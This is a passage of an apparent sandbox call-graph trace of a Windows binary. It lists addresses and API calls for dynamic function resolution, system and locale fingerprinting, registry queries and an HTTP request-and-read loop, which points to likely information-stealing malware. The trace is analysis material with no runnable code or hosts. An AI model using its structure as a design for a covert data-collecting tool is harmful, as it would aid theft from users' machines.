c545c0 2 API calls 14363->14364 14365 c53fcd 14364->14365 14366 c545c0 2 API calls 14365->14366 14367 c53fe6 14366->14367 14368 c545c0 2 API calls 14367->14368 14369 c53fff 14368->14369 14370 c545c0 2 API calls 14369->14370 14371 c54018 14370->14371 14372 c545c0 2 API calls 14371->14372 14373 c54031 14372->14373 14374 c545c0 2 API calls 14373->14374 14375 c5404a 14374->14375 14376 c545c0 2 API calls 14375->14376 14377 c54063 14376->14377 14378 c545c0 2 API calls 14377->14378 14379 c5407c 14378->14379 14380 c545c0 2 API calls 14379->14380 14381 c54095 14380->14381 14382 c545c0 2 API calls 14381->14382 14383 c540ae 14382->14383 14384 c545c0 2 API calls 14383->14384 14385 c540c7 14384->14385 14386 c545c0 2 API calls 14385->14386 14387 c540e0 14386->14387 14388 c545c0 2 API calls 14387->14388 14389 c540f9 14388->14389 14390 c545c0 2 API calls 14389->14390 14391 c54112 14390->14391 14392 c545c0 2 API calls 14391->14392 14393 c5412b 14392->14393 14394 c545c0 2 API calls 14393->14394 14395 c54144 14394->14395 14396 c545c0 2 API calls 14395->14396 14397 c5415d 14396->14397 14398 c545c0 2 API calls 14397->14398 14399 c54176 14398->14399 14400 c545c0 2 API calls 14399->14400 14401 c5418f 14400->14401 14402 c545c0 2 API calls 14401->14402 14403 c541a8 14402->14403 14404 c545c0 2 API calls 14403->14404 14405 c541c1 14404->14405 14406 c545c0 2 API calls 14405->14406 14407 c541da 14406->14407 14408 c545c0 2 API calls 14407->14408 14409 c541f3 14408->14409 14410 c545c0 2 API calls 14409->14410 14411 c5420c 14410->14411 14412 c545c0 2 API calls 14411->14412 14413 c54225 14412->14413 14414 c545c0 2 API calls 14413->14414 14415 c5423e 14414->14415 14416 c545c0 2 API calls 14415->14416 14417 c54257 14416->14417 14418 c545c0 2 API calls 14417->14418 14419 c54270 14418->14419 14420 c545c0 2 API calls 14419->14420 14421 c54289 14420->14421 14422 c545c0 2 API calls 14421->14422 14423 c542a2 14422->14423 14424 c545c0 2 API calls 14423->14424 14425 c542bb 14424->14425 14426 c545c0 2 API calls 14425->14426 14427 c542d4 14426->14427 14428 c545c0 2 API calls 14427->14428 14429 c542ed 14428->14429 14430 c545c0 2 API calls 14429->14430 14431 c54306 14430->14431 14432 c545c0 2 API calls 14431->14432 14433 c5431f 14432->14433 14434 c545c0 2 API calls 14433->14434 14435 c54338 14434->14435 14436 c545c0 2 API calls 14435->14436 14437 c54351 14436->14437 14438 c545c0 2 API calls 14437->14438 14439 c5436a 14438->14439 14440 c545c0 2 API calls 14439->14440 14441 c54383 14440->14441 14442 c545c0 2 API calls 14441->14442 14443 c5439c 14442->14443 14444 c545c0 2 API calls 14443->14444 14445 c543b5 14444->14445 14446 c545c0 2 API calls 14445->14446 14447 c543ce 14446->14447 14448 c545c0 2 API calls 14447->14448 14449 c543e7 14448->14449 14450 c545c0 2 API calls 14449->14450 14451 c54400 14450->14451 14452 c545c0 2 API calls 14451->14452 14453 c54419 14452->14453 14454 c545c0 2 API calls 14453->14454 14455 c54432 14454->14455 14456 c545c0 2 API calls 14455->14456 14457 c5444b 14456->14457 14458 c545c0 2 API calls 14457->14458 14459 c54464 14458->14459 14460 c545c0 2 API calls 14459->14460 14461 c5447d 14460->14461 14462 c545c0 2 API calls 14461->14462 14463 c54496 14462->14463 14464 c545c0 2 API calls 14463->14464 14465 c544af 14464->14465 14466 c545c0 2 API calls 14465->14466 14467 c544c8 14466->14467 14468 c545c0 2 API calls 14467->14468 14469 c544e1 14468->14469 14470 c545c0 2 API calls 14469->14470 14471 c544fa 14470->14471 14472 c545c0 2 API calls 14471->14472 14473 c54513 14472->14473 14474 c545c0 2 API calls 14473->14474 14475 c5452c 14474->14475 14476 c545c0 2 API calls 14475->14476 14477 c54545 14476->14477 14478 c545c0 2 API calls 14477->14478 14479 c5455e 14478->14479 14480 c545c0 2 API calls 14479->14480 14481 c54577 14480->14481 14482 c545c0 2 API calls 14481->14482 14483 c54590 14482->14483 14484 c545c0 2 API calls 14483->14484 14485 c545a9 14484->14485 14486 c69c10 14485->14486 14487 c6a036 8 API calls 14486->14487 14488 c69c20 43 API calls 14486->14488 14489 c6a146 14487->14489 14490 c6a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14487->14490 14488->14487 14491 c6a216 14489->14491 14492 c6a153 8 API calls 14489->14492 14490->14489 14493 c6a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14491->14493 14494 c6a298 14491->14494 14492->14491 14493->14494 14495 c6a337 14494->14495 14496 c6a2a5 6 API calls 14494->14496 14497 c6a344 9 API calls 14495->14497 14498 c6a41f 14495->14498 14496->14495 14497->14498 14499 c6a4a2 14498->14499 14500 c6a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14498->14500 14501 c6a4dc 14499->14501 14502 c6a4ab GetProcAddress GetProcAddress 14499->14502 14500->14499 14503 c6a515 14501->14503 14504 c6a4e5 GetProcAddress GetProcAddress 14501->14504 14502->14501 14505 c6a612 14503->14505 14506 c6a522 10 API calls 14503->14506 14504->14503 14507 c6a67d 14505->14507 14508 c6a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14508 14506->14505 14509 c6a686 GetProcAddress 14507->14509 14510 c6a69e 14507->14510 14508->14507 14509->14510 14511 c6a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14510->14511 14512 c65ca3 14510->14512 14511->14512 14513 c51590 14512->14513 15634 c51670 14513->15634 14516 c6a7a0 lstrcpy 14517 c515b5 14516->14517 14518 c6a7a0 lstrcpy 14517->14518 14519 c515c7 14518->14519 14520 c6a7a0 lstrcpy 14519->14520 14521 c515d9 14520->14521 14522 c6a7a0 lstrcpy 14521->14522 14523 c51663 14522->14523 14524 c65510 14523->14524 14525 c65521 14524->14525 14526 c6a820 2 API calls 14525->14526 14527 c6552e 14526->14527 14528 c6a820 2 API calls 14527->14528 14529 c6553b 14528->14529 14530 c6a820 2 API calls 14529->14530 14531 c65548 14530->14531 14532 c6a740 lstrcpy 14531->14532 14533 c65555 14532->14533 14534 c6a740 lstrcpy 14533->14534 14535 c65562 14534->14535 14536 c6a740 lstrcpy 14535->14536 14537 c6556f 14536->14537 14538 c6a740 lstrcpy 14537->14538 14578 c6557c 14538->14578 14539 c6a740 lstrcpy 14539->14578 14540 c6a7a0 lstrcpy 14540->14578 14541 c65643 StrCmpCA 14541->14578 14542 c656a0 StrCmpCA 14543 c657dc 14542->14543 14542->14578 14544 c6a8a0 lstrcpy 14543->14544 14545 c657e8 14544->14545 14546 c6a820 2 API calls 14545->14546 14548 c657f6 14546->14548 14547 c6a820 lstrlen lstrcpy 14547->14578 14550 c6a820 2 API calls 14548->14550 14549 c65856 StrCmpCA 14551 c65991 14549->14551 14549->14578 14553 c65805 14550->14553 14552 c6a8a0 lstrcpy 14551->14552 14554 c6599d 14552->14554 14555 c51670 lstrcpy 14553->14555 14556 c6a820 2 API calls 14554->14556 14575 c65811 14555->14575 14557 c659ab 14556->14557 14560 c6a820 2 API calls 14557->14560 14558 c65a0b StrCmpCA 14561 c65a16 Sleep 14558->14561 14562 c65a28 14558->14562 14559 c652c0 25 API calls 14559->14578 14563 c659ba 14560->14563 14561->14578 14564 c6a8a0 lstrcpy 14562->14564 14566 c51670 lstrcpy 14563->14566 14567 c65a34 14564->14567 14565 c51590 lstrcpy 14565->14578 14566->14575 14568 c6a820 2 API calls 14567->14568 14569 c65a43 14568->14569 14570 c6a820 2 API calls 14569->14570 14571 c65a52 14570->14571 14574 c51670 lstrcpy 14571->14574 14572 c6a8a0 lstrcpy 14572->14578 14573 c6578a StrCmpCA 14573->14578 14574->14575 14575->13631 14576 c6593f StrCmpCA 14576->14578 14577 c651f0 20 API calls 14577->14578 14578->14539 14578->14540 14578->14541 14578->14542 14578->14547 14578->14549 14578->14558 14578->14559 14578->14565 14578->14572 14578->14573 14578->14576 14578->14577 14580 c67553 GetVolumeInformationA 14579->14580 14581 c6754c 14579->14581 14582 c67591 14580->14582 14581->14580 14583 c675fc GetProcessHeap RtlAllocateHeap 14582->14583 14584 c67628 wsprintfA 14583->14584 14585 c67619 14583->14585 14587 c6a740 lstrcpy 14584->14587 14586 c6a740 lstrcpy 14585->14586 14588 c65da7 14586->14588 14587->14588 14588->13652 14590 c6a7a0 lstrcpy 14589->14590 14591 c54899 14590->14591 15643 c547b0 14591->15643 14593 c548a5 14594 c6a740 lstrcpy 14593->14594 14595 c548d7 14594->14595 14596 c6a740 lstrcpy 14595->14596 14597 c548e4 14596->14597 14598 c6a740 lstrcpy 14597->14598 14599 c548f1 14598->14599 14600 c6a740 lstrcpy 14599->14600 14601 c548fe 14600->14601 14602 c6a740 lstrcpy 14601->14602 14603 c5490b InternetOpenA StrCmpCA 14602->14603 14604 c54944 14603->14604 14605 c54ecb InternetCloseHandle 14604->14605 15649 c68b60 14604->15649 14606 c54ee8 14605->14606 15664 c59ac0 CryptStringToBinaryA 14606->15664 14608 c54963 15657 c6a920 14608->15657 14611 c54976 14613 c6a8a0 lstrcpy 14611->14613 14618 c5497f 14613->14618 14614 c6a820 2 API calls 14615 c54f05 14614->14615 14617 c6a9b0 4 API calls 14615->14617 14616 c54f27 codecvt 14620 c6a7a0 lstrcpy 14616->14620 14619 c54f1b 14617->14619 14622 c6a9b0 4 API calls 14618->14622 14621 c6a8a0 lstrcpy 14619->14621 14633 c54f57 14620->14633 14621->14616 14623 c549a9 14622->14623 14624 c6a8a0 lstrcpy 14623->14624 14625 c549b2 14624->14625 14626 c6a9b0 4 API calls 14625->14626 14627 c549d1 14626->14627 14628 c6a8a0 lstrcpy 14627->14628 14629 c549da 14628->14629 14630 c6a920 3 API calls 14629->14630 14631 c549f8 14630->14631 14632 c6a8a0 lstrcpy 14631->14632 14634 c54a01 14632->14634 14633->13655 14635 c6a9b0 4 API calls 14634->14635 14636 c54a20 14635->14636 14637 c6a8a0 lstrcpy 14636->14637 14638 c54a29 14637->14638 14639 c6a9b0 4 API calls 14638->14639 14640 c54a48 14639->14640 14641 c6a8a0 lstrcpy 14640->14641 14642 c54a51 14641->14642 14643 c6a9b0 4 API calls 14642->14643 14644 c54a7d 14643->14644 14645 c6a920 3 API calls 14644->14645 14646 c54a84 14645->14646 14647 c6a8a0 lstrcpy 14646->14647 14648 c54a8d 14647->14648 14649 c54aa3 InternetConnectA 14648->14649 14649->14605 14650 c54ad3 HttpOpenRequestA 14649->14650 14652 c54ebe InternetCloseHandle 14650->14652 14653 c54b28 14650->14653 14652->14605 14654 c6a9b0 4 API calls 14653->14654 14655 c54b3c 14654->14655 14656 c6a8a0 lstrcpy 14655->14656 14657 c54b45 14656->14657 14658 c6a920 3 API calls 14657->14658 14659 c54b63 14658->14659 14660 c6a8a0 lstrcpy 14659->14660 14661 c54b6c 14660->14661 14662 c6a9b0 4 API calls 14661->14662 14663 c54b8b 14662->14663 14664 c6a8a0 lstrcpy 14663->14664 14665 c54b94 14664->14665 14666 c6a9b0 4 API calls 14665->14666 14667 c54bb5 14666->14667 14668 c6a8a0 lstrcpy 14667->14668 14669 c54bbe 14668->14669 14670 c6a9b0 4 API calls 14669->14670 14671 c54bde 14670->14671 14672 c6a8a0 lstrcpy 14671->14672 14673 c54be7 14672->14673 14674 c6a9b0 4 API calls 14673->14674 14675 c54c06 14674->14675 14676 c6a8a0 lstrcpy 14675->14676 14677 c54c0f 14676->14677 14678 c6a920 3 API calls 14677->14678 14679 c54c2d 14678->14679 14680 c6a8a0 lstrcpy 14679->14680 14681 c54c36 14680->14681 14682 c6a9b0 4 API calls 14681->14682 14683 c54c55 14682->14683 14684 c6a8a0 lstrcpy 14683->14684 14685 c54c5e 14684->14685 14686 c6a9b0 4 API calls 14685->14686 14687 c54c7d 14686->14687 14688 c6a8a0 lstrcpy 14687->14688 14689 c54c86 14688->14689 14690 c6a920 3 API calls 14689->14690 14691 c54ca4 14690->14691 14692 c6a8a0 lstrcpy 14691->14692 14693 c54cad 14692->14693 14694 c6a9b0 4 API calls 14693->14694 14695 c54ccc 14694->14695 14696 c6a8a0 lstrcpy 14695->14696 14697 c54cd5 14696->14697 14698 c6a9b0 4 API calls 14697->14698 14699 c54cf6 14698->14699 14700 c6a8a0 lstrcpy 14699->14700 14701 c54cff 14700->14701 14702 c6a9b0 4 API calls 14701->14702 14703 c54d1f 14702->14703 14704 c6a8a0 lstrcpy 14703->14704 14705 c54d28 14704->14705 14706 c6a9b0 4 API calls 14705->14706 14707 c54d47 14706->14707 14708 c6a8a0 lstrcpy 14707->14708 14709 c54d50 14708->14709 14710 c6a920 3 API calls 14709->14710 14711 c54d6e 14710->14711 14712 c6a8a0 lstrcpy 14711->14712 14713 c54d77 14712->14713 14714 c6a740 lstrcpy 14713->14714 14715 c54d92 14714->14715 14716 c6a920 3 API calls 14715->14716 14717 c54db3 14716->14717 14718 c6a920 3 API calls 14717->14718 14719 c54dba 14718->14719 14720 c6a8a0 lstrcpy 14719->14720 14721 c54dc6 14720->14721 14722 c54de7 lstrlen 14721->14722 14723 c54dfa 14722->14723 14724 c54e03 lstrlen 14723->14724 15663 c6aad0 14724->15663 14726 c54e13 HttpSendRequestA 14727 c54e32 InternetReadFile 14726->14727 14728 c54e67 InternetCloseHandle 14727->14728 14733 c54e5e 14727->14733 14731 c6a800 14728->14731 14730 c6a9b0 4 API calls 14730->14733 14731->14652 14732 c6a8a0 lstrcpy 14732->14733 14733->14727 14733->14728 14733->14730 14733->14732 15670 c6aad0 14734->15670 14736 c617c4 StrCmpCA 14737 c617cf ExitProcess 14736->14737 14748 c617d7 14736->14748 14738 c619c2 14738->13657 14739 c618cf StrCmpCA 14739->14748 14740 c618ad StrCmpCA 14740->14748 14741 c61932 StrCmpCA 14741->14748 14742 c61913 StrCmpCA 14742->14748 14743 c61970 StrCmpCA 14743->14748 14744 c618f1 StrCmpCA 14744->14748 14745 c61951 StrCmpCA 14745->14748 14746 c6187f StrCmpCA 14746->14748 14747 c6185d StrCmpCA 14747->14748 14748->14738 14748->14739 14748->14740 14748->14741 14748->14742 14748->14743 14748->14744 14748->14745 14748->14746 14748->14747 14749 c6a820 lstrlen lstrcpy 14748->14749 14749->14748 14751 c6a7a0 lstrcpy 14750->14751 14752 c55979 14751->14752 14753 c547b0 2 API calls 14752->14753 14754 c55985 14753->14754 14755 c6a740 lstrcpy 14754->14755 14756 c559ba 14755->14756 14757 c6a740 lstrcpy 14756->14757 14758 c559c7 14757->14758 14759 c6a740 lstrcpy 14758->14759 14760 c559d4 14759->14760 14761 c6a740 lstrcpy 14760->14761 14762 c559e1 14761->14762 14763 c6a740 lstrcpy 14762->14763 14764 c559ee InternetOpenA StrCmpCA 14763->14764 14765 c55a1d 14764->14765 14766 c55fc3 InternetCloseHandle 14765->14766 14767 c68b60 3 API calls 14765->14767 14768 c55fe0 14766->14768 14769 c55a3c 14767->14769 14771 c59ac0 4 API calls 14768->14771 14770 c6a920 3 API calls 14769->14770 14772 c55a4f 14770->14772 14773 c55fe6 14771->14773 14774 c6a8a0 lstrcpy 14772->14774 14775 c6a820 2 API calls 14773->14775 14777 c5601f codecvt 14773->14777 14780 c55a58 14774->14780 14776 c55ffd 14775->14776 14778 c6a9b0 4 API calls 14776->14778 14782 c6a7a0 lstrcpy 14777->14782 14779 c56013 14778->14779 14781 c6a8a0 lstrcpy 14779->14781 14783 c6a9b0 4 API calls 14780->14783 14781->14777 14791 c5604f 14782->14791 14784 c55a82 14783->14784 14785 c6a8a0 lstrcpy 14784->14785 14786 c55a8b 14785->14786 14787 c6a9b0 4 API calls 14786->14787 14788 c55aaa 14787->14788 14789 c6a8a0 lstrcpy 14788->14789 14790 c55ab3 14789->14790 14792 c6a920 3 API calls 14790->14792 14791->13663 14793 c55ad1 14792->14793 14794 c6a8a0 lstrcpy 14793->14794 14795 c55ada 14794->14795 14796 c6a9b0 4 API calls 14795->14796 14797 c55af9 14796->14797 14798 c6a8a0 lstrcpy 14797->14798 14799 c55b02 14798->14799 14800 c6a9b0 4 API calls 14799->14800 14801 c55b21 14800->14801 14802 c6a8a0 lstrcpy 14801->14802 14803 c55b2a 14802->14803 14804 c6a9b0 4 API calls 14803->14804 14805 c55b56 14804->14805 14806 c6a920 3 API calls 14805->14806 14807 c55b5d 14806->14807 14808 c6a8a0 lstrcpy 14807->14808 14809 c55b66 14808->14809 14810 c55b7c InternetConnectA 14809->14810 14810->14766 14811 c55bac HttpOpenRequestA 14810->14811 14813 c55fb6 InternetCloseHandle 14811->14813 14814 c55c0b 14811->14814 14813->14766 14815 c6a9b0 4 API calls 14814->14815 14816 c55c1f 14815->14816 14817 c6a8a0 lstrcpy 14816->14817 14818 c55c28 14817->14818 14819 c6a920 3 API calls 14818->14819 14820 c55c46 14819->14820 14821 c6a8a0 lstrcpy 14820->14821 14822 c55c4f 14821->14822 14823 c6a9b0 4 API calls 14822->14823 14824 c55c6e 14823->14824 14825 c6a8a0 lstrcpy 14824->14825 14826 c55c77 14825->14826 14827 c6a9b0 4 API calls 14826->14827 14828 c55c98 14827->14828 14829 c6a8a0 lstrcpy 14828->14829 14830 c55ca1 14829->14830 14831 c6a9b0 4 API calls 14830->14831 14832 c55cc1 14831->14832 14833 c6a8a0 lstrcpy 14832->14833 14834 c55cca 14833->14834 14835 c6a9b0 4 API calls 14834->14835 14836 c55ce9 14835->14836 14837 c6a8a0 lstrcpy 14836->14837 14838 c55cf2 14837->14838 14839 c6a920 3 API calls 14838->14839 14840 c55d10 14839->14840 14841 c6a8a0 lstrcpy 14840->14841 14842 c55d19 14841->14842 14843 c6a9b0 4 API calls 14842->14843 14844 c55d38 14843->14844 14845 c6a8a0 lstrcpy 14844->14845 14846 c55d41 14845->14846 14847 c6a9b0 4 API calls 14846->14847 14848 c55d60 14847->14848 14849 c6a8a0 lstrcpy 14848->14849 14850 c55d69 14849->14850 14851 c6a920 3 API calls 14850->14851 14852 c55d87 14851->14852 14853 c6a8a0 lstrcpy 14852->14853 14854 c55d90 14853->14854 14855 c6a9b0 4 API calls 14854->14855 14856 c55daf 14855->14856 14857 c6a8a0 lstrcpy 14856->14857 14858 c55db8 14857->14858 14859 c6a9b0 4 API calls 14858->14859 14860 c55dd9 14859->14860 14861 c6a8a0 lstrcpy 14860->14861 14862 c55de2 14861->14862 14863 c6a9b0 4 API calls 14862->14863 14864 c55e02 14863->14864 14865 c6a8a0 lstrcpy 14864->14865 14866 c55e0b 14865->14866 14867 c6a9b0 4 API calls 14866->14867 14868 c55e2a 14867->14868 14869 c6a8a0 lstrcpy 14868->14869 14870 c55e33 14869->14870 14871 c6a920 3 API calls 14870->14871 14872 c55e54 14871->14872 14873 c6a8a0 lstrcpy 14872->14873 14874 c55e5d 14873->14874 14875 c55e70 lstrlen 14874->14875 15671 c6aad0 14875->15671 14877 c55e81 lstrlen GetProcessHeap RtlAllocateHeap 15672 c6aad0 14877->15672 14879 c55eae lstrlen 14880 c55ebe 14879->14880 14881 c55ed7 lstrlen 14880->14881 14882 c55ee7 14881->14882 14883 c55ef0 lstrlen 14882->14883 14884 c55f03 14883->14884 14885 c55f1a lstrlen 14884->14885 15673 c6aad0 14885->15673 14887 c55f2a HttpSendRequestA 14888 c55f35 InternetReadFile 14887->14888 14889 c55f6a InternetCloseHandle 14888->14889 14893 c55f61 14888->14893 14889->14813 14891 c6a9b0 4 API calls 14891->14893 14892 c6a8a0 lstrcpy 14892->14893 14893->14888 14893->14889 14893->14891 14893->14892 14896 c61077 14894->14896 14895 c61151 14895->13665 14896->14895 14897 c6a820 lstrlen lstrcpy 14896->14897 14897->14896 14903 c60db7 14898->14903 14899 c60f17 14899->13673 14900 c60e27 StrCmpCA 14900->14903 14901 c60e67 StrCmpCA 14901->14903 14902 c60ea4 StrCmpCA 14902->14903 14903->14899 14903->14900 14903->14901 14903->14902 14904 c6a820 lstrlen lstrcpy 14903->14904 14904->14903 14906 c60f67 14905->14906 14907 c60fb2 StrCmpCA 14906->14907 14908 c61044 14906->14908 14909 c6a820 lstrlen lstrcpy 14906->14909 14907->14906 14908->13681 14909->14906 14911 c6a740 lstrcpy 14910->14911 14912 c61a26 14911->14912 14913 c6a9b0 4 API calls 14912->14913 14914 c61a37 14913->14914 14915 c6a8a0 lstrcpy 14914->14915 14916 c61a40 14915->14916 14917 c6a9b0 4 API calls 14916->14917 14918 c61a5b 14917->14918 14919 c6a8a0 lstrcpy 14918->14919 14920 c61a64 14919->14920 14921 c6a9b0 4 API calls 14920->14921 14922 c61a7d 14921->14922 14923 c6a8a0 lstrcpy 14922->14923 14924 c61a86 14923->14924 14925 c6a9b0 4 API calls 14924->14925 14926 c61aa1 14925->14926 14927 c6a8a0 lstrcpy 14926->14927 14928 c61aaa 14927->14928 14929 c6a9b0 4 API calls 14928->14929 14930 c61ac3 14929->14930 14931 c6a8a0 lstrcpy 14930->14931 14932 c61acc 14931->14932 14933 c6a9b0 4 API calls 14932->14933 14934 c61ae7 14933->14934 14935 c6a8a0 lstrcpy 14934->14935 14936 c61af0 14935->14936 14937 c6a9b0 4 API calls 14936->14937 14938 c61b09 14937->14938 14939 c6a8a0 lstrcpy 14938->14939 14940 c61b12 14939->14940 14941 c6a9b0 4 API calls 14940->14941 14942 c61b2d 14941->14942 14943 c6a8a0 lstrcpy 14942->14943 14944 c61b36 14943->14944 14945 c6a9b0 4 API calls 14944->14945 14946 c61b4f 14945->14946 14947 c6a8a0 lstrcpy 14946->14947 14948 c61b58 14947->14948 14949 c6a9b0 4 API calls 14948->14949 14950 c61b76 14949->14950 14951 c6a8a0 lstrcpy 14950->14951 14952 c61b7f 14951->14952 14953 c67500 6 API calls 14952->14953 14954 c61b96 14953->14954 14955 c6a920 3 API calls 14954->14955 14956 c61ba9 14955->14956 14957 c6a8a0 lstrcpy 14956->14957 14958 c61bb2 14957->14958 14959 c6a9b0 4 API calls 14958->14959 14960 c61bdc 14959->14960 14961 c6a8a0 lstrcpy 14960->14961 14962 c61be5 14961->14962 14963 c6a9b0 4 API calls 14962->14963 14964 c61c05 14963->14964 14965 c6a8a0 lstrcpy 14964->14965 14966 c61c0e 14965->14966 15674 c67690 GetProcessHeap RtlAllocateHeap 14966->15674 14969 c6a9b0 4 API calls 14970 c61c2e 14969->14970 14971 c6a8a0 lstrcpy 14970->14971 14972 c61c37 14971->14972 14973 c6a9b0 4 API calls 14972->14973 14974 c61c56 14973->14974 14975 c6a8a0 lstrcpy 14974->14975 14976 c61c5f 14975->14976 14977 c6a9b0 4 API calls 14976->14977 14978 c61c80 14977->14978 14979 c6a8a0 lstrcpy 14978->14979 14980 c61c89 14979->14980 15681 c677c0 GetCurrentProcess IsWow64Process 14980->15681 14983 c6a9b0 4 API calls 14984 c61ca9 14983->14984 14985 c6a8a0 lstrcpy 14984->14985 14986 c61cb2 14985->14986 14987 c6a9b0 4 API calls 14986->14987 14988 c61cd1 14987->14988 14989 c6a8a0 lstrcpy 14988->14989 14990 c61cda 14989->14990 14991 c6a9b0 4 API calls 14990->14991 14992 c61cfb 14991->14992 14993 c6a8a0 lstrcpy 14992->14993 14994 c61d04 14993->14994 14995 c67850 3 API calls 14994->14995 14996 c61d14 14995->14996 14997 c6a9b0 4 API calls 14996->14997 14998 c61d24 14997->14998 14999 c6a8a0 lstrcpy 14998->14999 15000 c61d2d 14999->15000 15001 c6a9b0 4 API calls 15000->15001 15002 c61d4c 15001->15002 15003 c6a8a0 lstrcpy 15002->15003 15004 c61d55 15003->15004 15005 c6a9b0 4 API calls 15004->15005 15006 c61d75 15005->15006 15007 c6a8a0 lstrcpy 15006->15007 15008 c61d7e 15007->15008 15009 c678e0 3 API calls 15008->15009 15010 c61d8e 15009->15010 15011 c6a9b0 4 API calls 15010->15011 15012 c61d9e 15011->15012 15013 c6a8a0 lstrcpy 15012->15013 15014 c61da7 15013->15014 15015 c6a9b0 4 API calls 15014->15015 15016 c61dc6 15015->15016 15017 c6a8a0 lstrcpy 15016->15017 15018 c61dcf 15017->15018 15019 c6a9b0 4 API calls 15018->15019 15020 c61df0 15019->15020 15021 c6a8a0 lstrcpy 15020->15021 15022 c61df9 15021->15022 15683 c67980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15022->15683 15025 c6a9b0 4 API calls 15026 c61e19 15025->15026 15027 c6a8a0 lstrcpy 15026->15027 15028 c61e22 15027->15028 15029 c6a9b0 4 API calls 15028->15029 15030 c61e41 15029->15030 15031 c6a8a0 lstrcpy 15030->15031 15032 c61e4a 15031->15032 15033 c6a9b0 4 API calls 15032->15033 15034 c61e6b 15033->15034 15035 c6a8a0 lstrcpy 15034->15035 15036 c61e74 15035->15036 15685 c67a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15036->15685 15039 c6a9b0 4 API calls 15040 c61e94 15039->15040 15041 c6a8a0 lstrcpy 15040->15041 15042 c61e9d 15041->15042 15043 c6a9b0 4 API calls 15042->15043 15044 c61ebc 15043->15044 15045 c6a8a0 lstrcpy 15044->15045 15046 c61ec5 15045->15046 15047 c6a9b0 4 API calls 15046->15047 15048 c61ee5 15047->15048 15049 c6a8a0 lstrcpy 15048->15049 15050 c61eee 15049->15050 15688 c67b00 GetUserDefaultLocaleName 15050->15688 15053 c6a9b0 4 API calls 15054 c61f0e 15053->15054 15055 c6a8a0 lstrcpy 15054->15055 15056 c61f17 15055->15056 15057 c6a9b0 4 API calls 15056->15057 15058 c61f36 15057->15058 15059 c6a8a0 lstrcpy 15058->15059 15060 c61f3f 15059->15060 15061 c6a9b0 4 API calls 15060->15061 15062 c61f60 15061->15062 15063 c6a8a0 lstrcpy 15062->15063 15064 c61f69 15063->15064 15692 c67b90 15064->15692 15066 c61f80 15067 c6a920 3 API calls 15066->15067 15068 c61f93 15067->15068 15069 c6a8a0 lstrcpy 15068->15069 15070 c61f9c 15069->15070 15071 c6a9b0 4 API calls 15070->15071 15072 c61fc6 15071->15072 15073 c6a8a0 lstrcpy 15072->15073 15074 c61fcf 15073->15074 15075 c6a9b0 4 API calls 15074->15075 15076 c61fef 15075->15076 15077 c6a8a0 lstrcpy 15076->15077 15078 c61ff8 15077->15078 15704 c67d80 GetSystemPowerStatus 15078->15704 15081 c6a9b0 4 API calls 15082 c62018 15081->15082 15083 c6a8a0 lstrcpy 15082->15083 15084 c62021 15083->15084 15085 c6a9b0 4 API calls 15084->15085 15086 c62040 15085->15086 15087 c6a8a0 lstrcpy 15086->15087 15088 c62049 15087->15088 15089 c6a9b0 4 API calls 15088->15089 15090 c6206a 15089->15090 15091 c6a8a0 lstrcpy 15090->15091 15092 c62073 15091->15092 15093 c6207e GetCurrentProcessId 15092->15093 15706 c69470 OpenProcess 15093->15706 15096 c6a920 3 API calls 15097 c620a4 15096->15097 15098 c6a8a0 lstrcpy 15097->15098 15099 c620ad 15098->15099 15100 c6a9b0 4 API calls 15099->15100 15101 c620d7 15100->15101 15102 c6a8a0 lstrcpy 15101->15102 15103 c620e0 15102->15103 15104 c6a9b0 4 API calls 15103->15104 15105 c62100 15104->15105 15106 c6a8a0 lstrcpy 15105->15106 15107 c62109 15106->15107 15711 c67e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15107->15711 15110 c6a9b0 4 API calls 15111 c62129 15110->15111 15112 c6a8a0 lstrcpy 15111->15112 15113 c62132 15112->15113 15114 c6a9b0 4 API calls 15113->15114 15115 c62151 15114->15115 15116 c6a8a0 lstrcpy 15115->15116 15117 c6215a 15116->15117 15118 c6a9b0 4 API calls 15117->15118 15119 c6217b 15118->15119 15120 c6a8a0 lstrcpy 15119->15120 15121 c62184 15120->15121 15715 c67f60 15121->15715 15124 c6a9b0 4 API calls 15125 c621a4 15124->15125 15126 c6a8a0 lstrcpy 15125->15126 15127 c621ad 15126->15127 15128 c6a9b0 4 API calls 15127->15128 15129 c621cc 15128->15129 15130 c6a8a0 lstrcpy 15129->15130 15131 c621d5 15130->15131 15132 c6a9b0 4 API calls 15131->15132 15133 c621f6 15132->15133 15134 c6a8a0 lstrcpy 15133->15134 15135 c621ff 15134->15135 15728 c67ed0 GetSystemInfo wsprintfA 15135->15728 15138 c6a9b0 4 API calls 15139 c6221f 15138->15139 15140 c6a8a0 lstrcpy 15139->15140 15141 c62228 15140->15141 15142 c6a9b0 4 API calls 15141->15142 15143 c62247 15142->15143 15144 c6a8a0 lstrcpy 15143->15144 15145 c62250 15144->15145 15146 c6a9b0 4 API calls 15145->15146 15147 c62270 15146->15147 15148 c6a8a0 lstrcpy 15147->15148 15149 c62279 15148->15149 15730 c68100 GetProcessHeap RtlAllocateHeap 15149->15730 15152 c6a9b0 4 API calls 15153 c62299 15152->15153 15154 c6a8a0 lstrcpy 15153->15154 15155 c622a2 15154->15155 15156 c6a9b0 4 API calls 15155->15156 15157 c622c1 15156->15157 15158 c6a8a0 lstrcpy 15157->15158 15159 c622ca 15158->15159 15160 c6a9b0 4 API calls 15159->15160 15161 c622eb 15160->15161 15162 c6a8a0 lstrcpy 15161->15162 15163 c622f4 15162->15163 15736 c687c0 15163->15736 15166 c6a920 3 API calls 15167 c6231e 15166->15167 15168 c6a8a0 lstrcpy 15167->15168 15169 c62327 15168->15169 15170 c6a9b0 4 API calls 15169->15170 15171 c62351 15170->15171 15172 c6a8a0 lstrcpy 15171->15172 15173 c6235a 15172->15173 15174 c6a9b0 4 API calls 15173->15174 15175 c6237a 15174->15175 15176 c6a8a0 lstrcpy 15175->15176 15177 c62383 15176->15177 15178 c6a9b0 4 API calls 15177->15178 15179 c623a2 15178->15179 15180 c6a8a0 lstrcpy 15179->15180 15181 c623ab 15180->15181 15741 c681f0 15181->15741 15183 c623c2 15184 c6a920 3 API calls 15183->15184 15185 c623d5 15184->15185 15186 c6a8a0 lstrcpy 